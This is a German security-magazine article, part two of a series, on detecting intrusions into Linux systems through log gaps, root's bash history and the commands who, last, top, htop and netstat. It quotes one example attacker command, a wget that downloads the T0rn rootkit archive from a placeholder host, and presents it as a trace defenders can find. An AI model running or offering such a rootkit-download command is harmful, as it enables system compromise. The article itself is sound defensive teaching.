Einbruchserkennung mit Linux – Teil 2

Hacking mit Security-Tools wie Netstat, Snort und RKhunter aufspüren

05.05.2008 | Autor / Redakteur: Marko Rogge / Stephan Augsten

Linux-Systeme sind Angriffsziele für Hacker geworden, aber Admins können sich mit Tools wehren und Systemmanipulationen aufspüren.
Linux-Systeme sind Angriffsziele für Hacker geworden, aber Admins können sich mit Tools wehren und Systemmanipulationen aufspüren.

Linux-Systeme werden im professionellen Umfeld immer beliebter und sind deshalb längst auch interessante Angriffsziele für Hacker. Dank Open Source können sich Admins aber bei Linux-basierten Systemen detaillierter mit dem System befassen und damit über mitgelieferte Bordmittel kompromittierte Systeme und gefährliche Aktionen erkennen. Security-Insider.de verrät, welche Fehler Angreifer machen und welche Tools hilfreich sein können, um Angriffe sicher zu erkennen und sich davor zu schützen.

Versierte Angreifer würden in jedem Fall versuchen, die eigenen Spuren eines Angriffes zu verwischen und entsprechende Logfiles unbrauchbar zu machen. In diesem Fall wird es schwierig, Details einer Attacke gegen ein System in Erfahrung zu bringen.

Sofern in den Logfiles verräterische große Lücken in den Zeiten auftauchen, sollten Sie misstrauisch sein. Denn auch dann ist die Wahrscheinlichkeit sehr groß, dass ein Angreifer nur seine selbst generierten Einträge gelöscht hat.

Falls der Angreifer Daten und Dateien nachgeladen hat, um zum Beispiel ein Rootkit zu installieren, dürfte man diesen Vorgang in der .bash_history des root-Accounts sehen. Dort sollte der Befehl „wget“ mit der dazu gehörigen Datei auftauchen, die aus dem Internet nachgeladen wurde. Ein Beispiel könnte demnach wie folgt aussehen:

wget http://ultradomain.xxxx.co.uk/~/xxx/tk.tgz

Im vorgezeigten Beispiel würde die Datei „tk.tgz“ darauf deuten, dass es sehr wahrscheinlich ist, dass der Angreifer das Rootkit „T0rn“ nachgeladen und installiert hat. Hierbei ist größte Vorsicht geboten und das betroffene System sollte unbedingt auf Rootkit-Spuren untersucht werden. Im letzten Abschnitt gehen wir dann darauf ein, mit welchen Hilfsmitteln und Programmen Rootkits aufgespürt werden können.

Zunächst gehen wir weiter mit der Analyse voran und schauen, was genau auf einer Maschine läuft und welche User in einem System arbeiten. Die Befehle hierfür sollten hinlänglich bekannt sein und auch genutzt werden:

~$ who

In dieser who-Abfrage sollte sich auf der Konsole kein weiterer User befinden als der aktive Benutzer selbst. Befinden sich dort mehr angemeldete User, dann ist dies ein klares Anzeichen für einen erfolgreichen Angriff auf das betroffene System.

Weitere Details erhält man mit dem Konsolen-Befehl „last“, der Informationen zu aktuell angemeldeten Usern anzeigt und zusätzlich die Aktivitäten der vergangenen Tage aufzeigt. Die Kombination dieser beiden Konsolen-Befehle zeigt exakt auf, was derzeit aktuell in einem System arbeitet. Man erhält unter anderem auch Informationen zu abgesetzten Befehle in der Konsole, über die ein Angreifer grundlegend arbeitet.

Für eine Echtzeitüberwachung empfehlen wir den Befehl „top“. Um noch mehr Informationen herauszuholen und diese übersichtlicher dargestellt zu bekommen, sollte man sich „htop“ nachinstallieren. „htop“ zeigt farblich getrennt alle Details in Echtzeit auf einem System. Da eine solche Analyse sehr zeitintensiv ist, muss man unbedingt prüfen, welche Software über die Netzwerkschnittstellen kommuniziert:

~$ netstat –tanp

Seite 2: Mehr Sicherheit vor Angreifern: rkhunter findet Rootkits

Inhalt des Artikels:

Kommentare werden geladen....

Kommentar zu diesem Artikel

Anonym mitdiskutieren oder einloggen Anmelden

Avatar
Zur Wahrung unserer Interessen speichern wir zusätzlich zu den o.g. Informationen die IP-Adresse. Dies dient ausschließlich dem Zweck, dass Sie als Urheber des Kommentars identifiziert werden können. Rechtliche Grundlage ist die Wahrung berechtigter Interessen gem. Art 6 Abs 1 lit. f) DSGVO.
  1. Avatar
    Avatar
    Bearbeitet von am
    Bearbeitet von am
    1. Avatar
      Avatar
      Bearbeitet von am
      Bearbeitet von am

Kommentare werden geladen....

Kommentar melden

Melden Sie diesen Kommentar, wenn dieser nicht den Richtlinien entspricht.

Kommentar Freigeben

Der untenstehende Text wird an den Kommentator gesendet, falls dieser eine Email-hinterlegt hat.

Freigabe entfernen

Der untenstehende Text wird an den Kommentator gesendet, falls dieser eine Email-hinterlegt hat.

copyright

Dieser Beitrag ist urheberrechtlich geschützt. Sie wollen ihn für Ihre Zwecke verwenden? Infos finden Sie unter www.mycontentfactory.de (ID: 2012507 / Intrusion-Detection und -Prevention)